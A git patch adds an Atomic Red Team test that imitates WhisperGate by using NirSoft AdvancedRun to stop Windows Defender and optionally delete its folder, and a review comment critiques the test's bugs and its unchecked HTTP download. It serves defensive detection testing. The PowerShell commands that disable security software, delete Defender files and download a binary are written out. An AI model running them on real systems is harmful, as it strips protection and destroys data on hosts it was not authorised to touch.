From cbeebddaa4fecb952c61c2a10c7b375864d4cef4 Mon Sep 17 00:00:00 2001
From: Leo Verlod <96517806+Leomon5@users.noreply.github.com>
Date: Tue, 5 Apr 2022 10:59:08 -0500
Subject: [PATCH] Adding T1562.001 Test 28 (Issue 1839) (#1845)

* Adding T1562.001 Test 28 (Issue 1839)
* Updating T1562.001 YAML to include additional input arg and cleanup
* make folder delete optional
* Update T1562.001.yaml

Co-authored-by: Carrie Roberts
---
 atomics/T1562.001/T1562.001.yaml | 38 +++++++++++++++++++++++++++++++-
 1 file changed, 37 insertions(+), 1 deletion(-)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index f0a76542..486a1f61 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -585,4 +585,40 @@ atomic_tests:
 New-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 0
 cleanup_command: Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 1
 name: powershell
-
+- name: Disable Defender Using NirSoft AdvancedRun
+ description: |
+ Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html
+ This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
+ See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3
+ Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk.
+ supported_platforms:
+ - windows
+ input_arguments:
+ AdvancedRun_Location:
+ description: Path of Advanced Run executable
+ type: Path
+ default: '$env:temp\AdvancedRun.exe'
+ delete_defender_folder:
+ description: Set to 1 to also delete the Windows Defender folder
+ type: Integer
+ default: 0
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Advancedrun.exe must exist at #{AdvancedRun_Location}
+ prereq_command: |
+ if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip"
+ Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force
+ executor:
+ command: |
+ Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
+ if(#{delete_defender_folder}){
+ $CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
+ Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
+ }
+ cleanup_command: |
+ Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
+ name: powershell
+ elevation_required: true
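Review bot: In the new test's `command` block, `$CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse` is a pipeline assignment, so it attempts the deletion immediately in the runner's own PowerShell session and stores its empty output; the AdvancedRun call on the next line then launches powershell.exe with an empty `/CommandLine ""`, and the folder removal never goes through `/RunAs 8` as the description implies. Building a string instead, `$CommandToRun = "rmdir '$env:programdata\Microsoft\Windows Defender' -Recurse"`, hands the real command to AdvancedRun. The surrounding `Try {…} Catch{}` wrappers add nothing, since a non-zero exit from `cmd /c` is not a terminating error in PowerShell, so a failed `sc.exe stop WinDefend` is silently reported as success. Separately, `get_prereq_command` fetches advancedrun.zip over plain `http://` and the extracted binary is then run on an elevated host (`elevation_required: true`) under `/RunAs 8`; switching to `https://www.nirsoft.net/utils/advancedrun.zip` and comparing the archive against a SHA256 pinned when the test was authored would close the in-transit tampering window. Finally, `cleanup_command` only restarts WinDefend and cannot restore the deleted folder, so the description should warn that `delete_defender_folder` is destructive, e.g. `Note: deleting the Defender folder is not undone by the cleanup command; run only on a disposable test host.`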